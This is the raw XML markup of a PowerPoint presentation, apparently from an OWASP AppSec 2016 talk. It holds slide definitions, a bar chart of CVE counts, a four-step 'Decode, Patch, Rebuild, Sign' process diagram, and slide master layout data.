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4v" ContentType="video/unknown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9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4" r:id="rId11"/>
    <p:sldId id="291" r:id="rId12"/>
    <p:sldId id="265" r:id="rId13"/>
    <p:sldId id="266" r:id="rId14"/>
    <p:sldId id="267" r:id="rId15"/>
    <p:sldId id="268" r:id="rId16"/>
    <p:sldId id="292" r:id="rId17"/>
    <p:sldId id="293" r:id="rId18"/>
    <p:sldId id="271" r:id="rId19"/>
    <p:sldId id="272" r:id="rId20"/>
    <p:sldId id="273" r:id="rId21"/>
    <p:sldId id="274" r:id="rId22"/>
    <p:sldId id="275" r:id="rId23"/>
    <p:sldId id="276" r:id="rId24"/>
    <p:sldId id="290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5D2B"/>
    <a:srgbClr val="404040"/>
    <a:srgbClr val="004685"/>
    <a:srgbClr val="D8A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5" autoAdjust="0"/>
    <p:restoredTop sz="92946" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0" snapToObjects="1" showGuides="1">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="118" d="100"/>
          <a:sy n="118" d="100"/>
        </p:scale>
        <p:origin x="1320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CVEs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0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Sheet1!$B$2:$B$10</c:f>
              <c:numCache>
                <c:formatCode>0</c:formatCode>
                <c:ptCount val="9"/>
                <c:pt idx="0">
                  <c:v>1.0</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>9.0</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>27.0</c:v>
                </c:pt>
                <c:pt idx="3">
                  <c:v>32.0</c:v>
                </c:pt>
                <c:pt idx="4">
                  <c:v>37.0</c:v>
                </c:pt>
                <c:pt idx="5">
                  <c:v>112.0</c:v>
                </c:pt>
                <c:pt idx="6">
                  <c:v>90.0</c:v>
                </c:pt>
                <c:pt idx="7">
                  <c:v>120.0</c:v>
                </c:pt>
                <c:pt idx="8">
                  <c:v>67.0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Trajectory (Apr 15')</c:v>
                </c:pt>
              </c:strCache>
            </c:strRef>
          </c:tx>
          <c:spPr>
            <a:pattFill prst="wdUpDiag">
              <a:fgClr>
                <a:schemeClr val="tx2">
                  <a:lumMod val="20000"/>
                  <a:lumOff val="80000"/>
                </a:schemeClr>
              </a:fgClr>
              <a:bgClr>
                <a:schemeClr val="tx2"/>
              </a:bgClr>
            </a:pattFill>
            <a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
              <a:noFill/>
              <a:prstDash val="solid"/>
            </a:ln>
            <a:effectLst/>
          </c:spPr>
          <c:invertIfNegative val="0"/>
          <c:cat>
            <c:numRef>
              <c:f>Sheet1!$A$2:$A$10</c:f>
              <c:numCache>
                <c:formatCode>0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Sheet1!$C$2:$C$10</c:f>
              <c:numCache>
                <c:formatCode>0</c:formatCode>
                <c:ptCount val="9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102.0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4975328"/>
        <c:axId val="2134911600"/>
      </c:barChart>
      <c:catAx>
        <c:axId val="2134975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911600"/>
        <c:crosses val="autoZero"/>
        <c:auto val="1"/>
        <c:lblAlgn val="ctr"/>
        <c:lblOffset val="100"/>
        <c:noMultiLvlLbl val="0"/>
      </c:catAx>
      <c:valAx>
        <c:axId val="2134911600"/>
        <c:scaling>
          <c:orientation val="minMax"/>
          <c:max val="250.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975328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21DE9-DFD2-9743-836B-652B7C771EA9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341DC-C6E3-7744-B72F-A5975B24A8C7}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:rPr>
            <a:t>Decode</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="2000" dirty="0">
            <a:latin typeface="Arial"/>
            <a:cs typeface="Arial"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C37175CC-E681-DB42-AC67-5ABDAA5837E6}" type="parTrans" cxnId="{344C87CA-4860-B143-BB98-8C67E72C426B}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US" sz="2000">
            <a:latin typeface="Arial"/>
            <a:cs typeface="Arial"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{9E79B949-53E5-4045-A94B-951674D3459B}" type="sibTrans" cxnId="{344C87CA-4860-B143-BB98-8C67E72C426B}">
      <dgm:prSet custT="1"/>
      <dgm:spPr>
        <a:solidFill>
          <a:srgbClr val="004685"/>
        </a:solidFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US" sz="2000">
            <a:latin typeface="Arial"/>
            <a:cs typeface="Arial"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{23D55943-6A92-6949-9057-63A8A46AF40B}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:rPr>
            <a:t>Patch</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="2000" dirty="0">
            <a:latin typeface="Arial"/>
            <a:cs typeface="Arial"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{5A7A41A9-F63B-FD4D-A67F-2FC1509E2CA3}" type="parTrans" cxnId="{662D230A-3F1F-3F4F-899D-08D69CB26F07}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US" sz="2000">
            <a:latin typeface="Arial"/>
            <a:cs typeface="Arial"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{74FDFE25-33AF-FD44-9764-0186EDA2B902}" type="sibTrans" cxnId="{662D230A-3F1F-3F4F-899D-08D69CB26F07}">
      <dgm:prSet custT="1"/>
      <dgm:spPr>
        <a:solidFill>
          <a:srgbClr val="004685"/>
        </a:solidFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US" sz="2000">
            <a:latin typeface="Arial"/>
            <a:cs typeface="Arial"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C0C3BBE9-1A3C-884A-9119-D90F2743BC0C}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:rPr>
            <a:t>Rebuild</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="2000" dirty="0">
            <a:latin typeface="Arial"/>
            <a:cs typeface="Arial"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D29A5FF2-D214-9949-BB25-E7820EC76E33}" type="parTrans" cxnId="{F6A4E939-11C9-874D-B581-A1EDF42D130A}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US" sz="2000">
            <a:latin typeface="Arial"/>
            <a:cs typeface="Arial"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C33C28C4-9F9A-2C4E-A3D2-24EE62FC3F91}" type="sibTrans" cxnId="{F6A4E939-11C9-874D-B581-A1EDF42D130A}">
      <dgm:prSet custT="1"/>
      <dgm:spPr>
        <a:solidFill>
          <a:srgbClr val="004685"/>
        </a:solidFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US" sz="2000">
            <a:latin typeface="Arial"/>
            <a:cs typeface="Arial"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F8F4173E-2E3F-744F-9390-2855A1B88631}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:rPr>
            <a:t>Sign</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="2000" dirty="0">
            <a:latin typeface="Arial"/>
            <a:cs typeface="Arial"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C6C908AF-8426-804A-BBBD-074E4C567796}" type="parTrans" cxnId="{9E2FE7F6-6CC8-CF47-845A-31F4709B0315}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US" sz="2000">
            <a:latin typeface="Arial"/>
            <a:cs typeface="Arial"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{4220475B-C084-E84D-A640-390F65EF728F}" type="sibTrans" cxnId="{9E2FE7F6-6CC8-CF47-845A-31F4709B0315}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US" sz="2000">
            <a:latin typeface="Arial"/>
            <a:cs typeface="Arial"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{12E1E59F-FB04-584C-A5F0-02D8B24A9920}" type="pres">
      <dgm:prSet presAssocID="{24021DE9-DFD2-9743-836B-652B7C771E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BF3E4C-FD08-D04D-860B-3DEB621D98E3}" type="pres">
      <dgm:prSet presAssocID="{0FD341DC-C6E3-7744-B72F-A5975B24A8C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2A7FF5-BA3A-7A4A-B9F2-93AF802D1424}" type="pres">
      <dgm:prSet presAssocID="{9E79B949-53E5-4045-A94B-951674D3459B}" presName="sibTrans" presStyleLbl="sibTrans2D1" presStyleIdx="0" presStyleCnt="3"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{780E6B84-F891-9941-BD12-D803CABE19D3}" type="pres">
      <dgm:prSet presAssocID="{9E79B949-53E5-4045-A94B-951674D3459B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7CBF7089-3122-1C41-9B3A-EC9AB218281B}" type="pres">
      <dgm:prSet presAssocID="{23D55943-6A92-6949-9057-63A8A46AF40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21C37-1668-5145-BC83-F95419A0D2BA}" type="pres">
      <dgm:prSet presAssocID="{74FDFE25-33AF-FD44-9764-0186EDA2B90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FF34EAE-CEE7-E44A-820D-3D98DD01D185}" type="pres">
      <dgm:prSet presAssocID="{74FDFE25-33AF-FD44-9764-0186EDA2B90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A97E0D9-96CA-4741-80CC-528E78374851}" type="pres">
      <dgm:prSet presAssocID="{C0C3BBE9-1A3C-884A-9119-D90F2743BC0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DA4D0-986A-3347-8224-B247F14876F9}" type="pres">
      <dgm:prSet presAssocID="{C33C28C4-9F9A-2C4E-A3D2-24EE62FC3F9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53F7A4D5-42EE-524A-B067-E996AF73CAB4}" type="pres">
      <dgm:prSet presAssocID="{C33C28C4-9F9A-2C4E-A3D2-24EE62FC3F9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F5568EB-2D62-FC4A-997B-33C618720B45}" type="pres">
      <dgm:prSet presAssocID="{F8F4173E-2E3F-744F-9390-2855A1B8863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D96DA7-1C86-AB46-9988-89ACEA6F340B}" type="presOf" srcId="{23D55943-6A92-6949-9057-63A8A46AF40B}" destId="{7CBF7089-3122-1C41-9B3A-EC9AB218281B}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process1"/>
    <dgm:cxn modelId="{7837A1FA-7E8A-B144-8DFC-5099F64619AC}" type="presOf" srcId="{C33C28C4-9F9A-2C4E-A3D2-24EE62FC3F91}" destId="{53F7A4D5-42EE-524A-B067-E996AF73CAB4}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process1"/>
    <dgm:cxn modelId="{3305112F-1DD2-5349-BE64-54D584C4DF65}" type="presOf" srcId="{F8F4173E-2E3F-744F-9390-2855A1B88631}" destId="{2F5568EB-2D62-FC4A-997B-33C618720B45}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process1"/>
    <dgm:cxn modelId="{FEDA6B93-0B3E-F546-BC21-FCE2BB4718C2}" type="presOf" srcId="{24021DE9-DFD2-9743-836B-652B7C771EA9}" destId="{12E1E59F-FB04-584C-A5F0-02D8B24A9920}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process1"/>
    <dgm:cxn modelId="{6C0AE0E3-AFF4-524E-AC05-67AD04F63A78}" type="presOf" srcId="{0FD341DC-C6E3-7744-B72F-A5975B24A8C7}" destId="{12BF3E4C-FD08-D04D-860B-3DEB621D98E3}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process1"/>
    <dgm:cxn modelId="{9B4C6738-666B-174B-8392-373CE372A3EB}" type="presOf" srcId="{9E79B949-53E5-4045-A94B-951674D3459B}" destId="{1F2A7FF5-BA3A-7A4A-B9F2-93AF802D1424}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process1"/>
    <dgm:cxn modelId="{403CCE47-863B-0345-957C-C00D4E8CE651}" type="presOf" srcId="{C33C28C4-9F9A-2C4E-A3D2-24EE62FC3F91}" destId="{BE4DA4D0-986A-3347-8224-B247F14876F9}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process1"/>
    <dgm:cxn modelId="{344C87CA-4860-B143-BB98-8C67E72C426B}" srcId="{24021DE9-DFD2-9743-836B-652B7C771EA9}" destId="{0FD341DC-C6E3-7744-B72F-A5975B24A8C7}" srcOrd="0" destOrd="0" parTransId="{C37175CC-E681-DB42-AC67-5ABDAA5837E6}" sibTransId="{9E79B949-53E5-4045-A94B-951674D3459B}"/>
    <dgm:cxn modelId="{662D230A-3F1F-3F4F-899D-08D69CB26F07}" srcId="{24021DE9-DFD2-9743-836B-652B7C771EA9}" destId="{23D55943-6A92-6949-9057-63A8A46AF40B}" srcOrd="1" destOrd="0" parTransId="{5A7A41A9-F63B-FD4D-A67F-2FC1509E2CA3}" sibTransId="{74FDFE25-33AF-FD44-9764-0186EDA2B902}"/>
    <dgm:cxn modelId="{6FCD1A45-3026-A64E-B59B-0DC87F018BD4}" type="presOf" srcId="{C0C3BBE9-1A3C-884A-9119-D90F2743BC0C}" destId="{9A97E0D9-96CA-4741-80CC-528E78374851}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process1"/>
    <dgm:cxn modelId="{F16EC215-658B-1046-B1CE-197C25F5541D}" type="presOf" srcId="{9E79B949-53E5-4045-A94B-951674D3459B}" destId="{780E6B84-F891-9941-BD12-D803CABE19D3}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process1"/>
    <dgm:cxn modelId="{3AE24EE5-F3A3-4948-AC44-EB55F4E98D69}" type="presOf" srcId="{74FDFE25-33AF-FD44-9764-0186EDA2B902}" destId="{CFB21C37-1668-5145-BC83-F95419A0D2BA}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process1"/>
    <dgm:cxn modelId="{9E2FE7F6-6CC8-CF47-845A-31F4709B0315}" srcId="{24021DE9-DFD2-9743-836B-652B7C771EA9}" destId="{F8F4173E-2E3F-744F-9390-2855A1B88631}" srcOrd="3" destOrd="0" parTransId="{C6C908AF-8426-804A-BBBD-074E4C567796}" sibTransId="{4220475B-C084-E84D-A640-390F65EF728F}"/>
    <dgm:cxn modelId="{A153B010-2C10-F648-9900-34662FDE5226}" type="presOf" srcId="{74FDFE25-33AF-FD44-9764-0186EDA2B902}" destId="{EFF34EAE-CEE7-E44A-820D-3D98DD01D185}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process1"/>
    <dgm:cxn modelId="{F6A4E939-11C9-874D-B581-A1EDF42D130A}" srcId="{24021DE9-DFD2-9743-836B-652B7C771EA9}" destId="{C0C3BBE9-1A3C-884A-9119-D90F2743BC0C}" srcOrd="2" destOrd="0" parTransId="{D29A5FF2-D214-9949-BB25-E7820EC76E33}" sibTransId="{C33C28C4-9F9A-2C4E-A3D2-24EE62FC3F91}"/>
    <dgm:cxn modelId="{3D96BCD5-11F0-AF4F-8FE8-6B46533D4E85}" type="presParOf" srcId="{12E1E59F-FB04-584C-A5F0-02D8B24A9920}" destId="{12BF3E4C-FD08-D04D-860B-3DEB621D98E3}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process1"/>
    <dgm:cxn modelId="{02C55648-6101-5A4C-AC5C-C63562E94D63}" type="presParOf" srcId="{12E1E59F-FB04-584C-A5F0-02D8B24A9920}" destId="{1F2A7FF5-BA3A-7A4A-B9F2-93AF802D1424}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process1"/>
    <dgm:cxn modelId="{40F44440-19C5-074E-ADB0-943D585E1EB2}" type="presParOf" srcId="{1F2A7FF5-BA3A-7A4A-B9F2-93AF802D1424}" destId="{780E6B84-F891-9941-BD12-D803CABE19D3}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process1"/>
    <dgm:cxn modelId="{CA565E5B-51F8-1B45-BFA3-8960AC3D01FD}" type="presParOf" srcId="{12E1E59F-FB04-584C-A5F0-02D8B24A9920}" destId="{7CBF7089-3122-1C41-9B3A-EC9AB218281B}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process1"/>
    <dgm:cxn modelId="{590CBA97-28BB-E34B-AFE7-85F898C6E0B7}" type="presParOf" srcId="{12E1E59F-FB04-584C-A5F0-02D8B24A9920}" destId="{CFB21C37-1668-5145-BC83-F95419A0D2BA}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process1"/>
    <dgm:cxn modelId="{CB5AF693-BA05-0F4E-A7DF-C81E9C7E4335}" type="presParOf" srcId="{CFB21C37-1668-5145-BC83-F95419A0D2BA}" destId="{EFF34EAE-CEE7-E44A-820D-3D98DD01D185}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process1"/>
    <dgm:cxn modelId="{FEDBD79F-773D-9F4A-A923-833E23D45C34}" type="presParOf" srcId="{12E1E59F-FB04-584C-A5F0-02D8B24A9920}" destId="{9A97E0D9-96CA-4741-80CC-528E78374851}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process1"/>
    <dgm:cxn modelId="{72944CFF-A9C8-844D-A6AB-67A12662EEE3}" type="presParOf" srcId="{12E1E59F-FB04-584C-A5F0-02D8B24A9920}" destId="{BE4DA4D0-986A-3347-8224-B247F14876F9}" srcOrd="5" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process1"/>
    <dgm:cxn modelId="{2A5CFFD0-521E-9D4F-8CE7-F05596CC6A34}" type="presParOf" srcId="{BE4DA4D0-986A-3347-8224-B247F14876F9}" destId="{53F7A4D5-42EE-524A-B067-E996AF73CAB4}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process1"/>
    <dgm:cxn modelId="{DB68585C-AAF9-B944-9C25-815F0BB85B4E}" type="presParOf" srcId="{12E1E59F-FB04-584C-A5F0-02D8B24A9920}" destId="{2F5568EB-2D62-FC4A-997B-33C618720B45}" srcOrd="6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F3E4C-FD08-D04D-860B-3DEB621D98E3}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3644" y="253396"/>
          <a:ext cx="1593646" cy="956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cs typeface="Arial"/>
            </a:rPr>
            <a:t>Decode</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="2000" kern="1200" dirty="0">
            <a:latin typeface="Arial"/>
            <a:cs typeface="Arial"/>
          </a:endParaRPr>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="31650" y="281402"/>
        <a:ext cx="1537634" cy="900176"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{1F2A7FF5-BA3A-7A4A-B9F2-93AF802D1424}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1756656" y="533878"/>
          <a:ext cx="337853" cy="395224"/>
        </a:xfrm>
        <a:prstGeom prst="rightArrow">
          <a:avLst>
            <a:gd name="adj1" fmla="val 60000"/>
            <a:gd name="adj2" fmla="val 50000"/>
          </a:avLst>
        </a:prstGeom>
        <a:solidFill>
          <a:srgbClr val="00468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Arial"/>
            <a:cs typeface="Arial"/>
          </a:endParaRPr>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1756656" y="612923"/>
        <a:ext cx="236497" cy="237134"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{7CBF7089-3122-1C41-9B3A-EC9AB218281B}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2234750" y="253396"/>
          <a:ext cx="1593646" cy="956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cs typeface="Arial"/>
            </a:rPr>
            <a:t>Patch</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="2000" kern="1200" dirty="0">
            <a:latin typeface="Arial"/>
            <a:cs typeface="Arial"/>
          </a:endParaRPr>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="2262756" y="281402"/>
        <a:ext cx="1537634" cy="900176"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{CFB21C37-1668-5145-BC83-F95419A0D2BA}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3987762" y="533878"/>
          <a:ext cx="337853" cy="395224"/>
        </a:xfrm>
        <a:prstGeom prst="rightArrow">
          <a:avLst>
            <a:gd name="adj1" fmla="val 60000"/>
            <a:gd name="adj2" fmla="val 50000"/>
          </a:avLst>
        </a:prstGeom>
        <a:solidFill>
          <a:srgbClr val="00468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Arial"/>
            <a:cs typeface="Arial"/>
          </a:endParaRPr>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="3987762" y="612923"/>
        <a:ext cx="236497" cy="237134"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{9A97E0D9-96CA-4741-80CC-528E78374851}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="4465856" y="253396"/>
          <a:ext cx="1593646" cy="956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cs typeface="Arial"/>
            </a:rPr>
            <a:t>Rebuild</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="2000" kern="1200" dirty="0">
            <a:latin typeface="Arial"/>
            <a:cs typeface="Arial"/>
          </a:endParaRPr>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="4493862" y="281402"/>
        <a:ext cx="1537634" cy="900176"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{BE4DA4D0-986A-3347-8224-B247F14876F9}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="6218868" y="533878"/>
          <a:ext cx="337853" cy="395224"/>
        </a:xfrm>
        <a:prstGeom prst="rightArrow">
          <a:avLst>
            <a:gd name="adj1" fmla="val 60000"/>
            <a:gd name="adj2" fmla="val 50000"/>
          </a:avLst>
        </a:prstGeom>
        <a:solidFill>
          <a:srgbClr val="00468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>
            <a:latin typeface="Arial"/>
            <a:cs typeface="Arial"/>
          </a:endParaRPr>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="6218868" y="612923"/>
        <a:ext cx="236497" cy="237134"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{2F5568EB-2D62-FC4A-997B-33C618720B45}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="6696962" y="253396"/>
          <a:ext cx="1593646" cy="9561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/>
              <a:cs typeface="Arial"/>
            </a:rPr>
            <a:t>Sign</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="2000" kern="1200" dirty="0">
            <a:latin typeface="Arial"/>
            <a:cs typeface="Arial"/>
          </a:endParaRPr>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="6724968" y="281402"/>
        <a:ext cx="1537634" cy="900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EA70A-F2DB-9F4C-99F1-5BE614564CB9}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>7/1/16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2A3BE-31E0-C941-975A-996AD1DEFDF4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78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31AF089-CFA2-0949-B174-A0D817FF28B1}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>7/1/16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dirty="0"/>
              <a:t>Click to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-CH" dirty="0" err="1"/>
              <a:t>edit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-CH" dirty="0"/>
              <a:t> Master </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-CH" dirty="0" err="1"/>
              <a:t>text</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-CH" dirty="0"/>
              <a:t> styles</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-CH" dirty="0"/>
              <a:t>Second </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-CH" dirty="0" err="1"/>
              <a:t>level</a:t>
            </a:r>
            <a:endParaRPr lang="fr-CH" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="fr-CH" dirty="0" err="1"/>
              <a:t>Third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3"/>
            <a:r>
              <a:rPr lang="fr-CH" dirty="0" err="1"/>
              <a:t>Fourth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fr-CH" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="fr-CH" dirty="0" err="1"/>
              <a:t>Fifth</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-CH" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-CH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92430503-779B-D542-BBAD-A27B1F4FDF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7894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5D0F-15CB-5241-8DA7-9EC6F9751AD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58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30503-779B-D542-BBAD-A27B1F4FDF7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62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5D0F-15CB-5241-8DA7-9EC6F9751AD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2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35D0F-15CB-5241-8DA7-9EC6F9751AD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10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62620" y="1851830"/>
            <a:ext cx="7724180" cy="85725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pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7" descr="owasp_appsec2016_colosseo_horizontal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-4266" y="-171636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8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2495" y="4741200"/>
            <a:ext cx="788610" cy="273844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defRPr lang="en-GB" sz="9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BE9C67AB-B614-C742-93A2-1DCA2D6D22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owasp_appsec2016_colosseo_horizonta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83566" y="3790764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09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screen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87910"/>
            <a:ext cx="7772400" cy="742950"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr sz="3200" b="1" cap="all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62769"/>
            <a:ext cx="7772400" cy="1125140"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0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pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6" descr="owasp_appsec2016_colosseo_horizontal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-4266" y="-171636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15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2495" y="4741200"/>
            <a:ext cx="788610" cy="273844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defRPr lang="en-GB" sz="9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BE9C67AB-B614-C742-93A2-1DCA2D6D22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owasp_appsec2016_colosseo_horizonta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83566" y="3790764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2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5600" y="4740049"/>
            <a:ext cx="3581401" cy="273844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2495" y="4741200"/>
            <a:ext cx="788610" cy="273844"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
